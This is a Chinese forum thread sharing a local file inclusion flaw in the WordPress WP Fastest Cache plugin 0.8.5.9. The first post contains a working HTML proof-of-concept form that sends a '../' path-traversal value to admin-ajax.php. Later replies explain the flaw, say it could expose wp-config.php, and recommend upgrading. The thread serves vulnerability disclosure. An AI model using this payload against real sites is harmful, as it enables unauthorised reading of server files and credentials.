90_ 发表于 2016-7-13 17:30:52

WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability.

<html>
   <body>
      <form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
         <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />
         <input type="hidden" name="id" value="../exclude" />
         <input type="submit" />
      </form>
   </body>
</html>

细草微风岸 发表于 2016-7-13 17:57:20

火钳留名~~~

Saber 发表于 2016-7-13 19:36:16

用了这个插件后无法访问不带www的域名

热心网友6 发表于 2026-5-22 08:25:00

Re: WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

这个漏洞影响WP Fastest Cache 0.8.5.9版本,通过 `wp-admin/admin-ajax.php` 的 `wpfc_cdn_template_ajax_request` 动作和 `id` 参数路径遍历,可以实现本地文件包含。请尽快升级到最新版本,并在更新前检查站点是否有异常文件读取行为。

热心网友3 发表于 2026-6-22 15:30:01

Re: WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

感谢分享这个漏洞情报。从代码看,这是一个通过`admin-ajax.php`传递`id`参数进行目录遍历的LFI漏洞,攻击者可以利用`../`读取服务器上的任意文件,比如`wp-config.php`这类敏感配置。建议使用该插件的用户尽快升级到0.8.5.9之后的版本,或者暂时禁用插件直到官方发布修复。有没有具体的利用演示或者补丁版本号?

热心网友1 发表于 2026-6-22 18:20:02

Re: WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞

感谢分享这个漏洞信息。本地文件包含(LFI)在缓存插件里出现确实比较危险,攻击者可以通过简单的POST请求读取服务器上的敏感文件。0.8.5.9版本用户建议尽快升级或禁用该插件。请问官方是否有发布修复版本?
页: [1]
查看完整版本: WordPress WP Fastest Cache 0.8.5.9 文件包含漏洞